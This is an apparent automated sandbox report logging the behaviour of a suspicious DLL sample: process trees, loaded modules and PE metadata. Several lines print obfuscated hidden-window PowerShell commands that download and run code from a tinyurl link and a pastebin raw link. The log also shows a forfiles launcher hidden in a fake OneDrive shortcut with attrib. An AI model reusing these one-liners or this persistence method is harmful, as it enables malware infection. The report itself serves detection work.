Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dll
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\loaddll64.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll64.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\forfiles.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.6.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: HQsitBLlOv.dllStatic PE information: Image base 0x180000000 > 0x60000000
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: HQsitBLlOv.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbHF source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 364e35\System.Management.Automation.pdbT source: powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4Gm source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbh source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3056953361.00000242CC694000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb6 source: powershell.exe, 00000006.00000002.2996314232.00000276F7C08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbR source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb^ source: powershell.exe, 00000007.00000002.3027895006.000002271A196000.00000004.00000020.00020000.00000000.sdmp
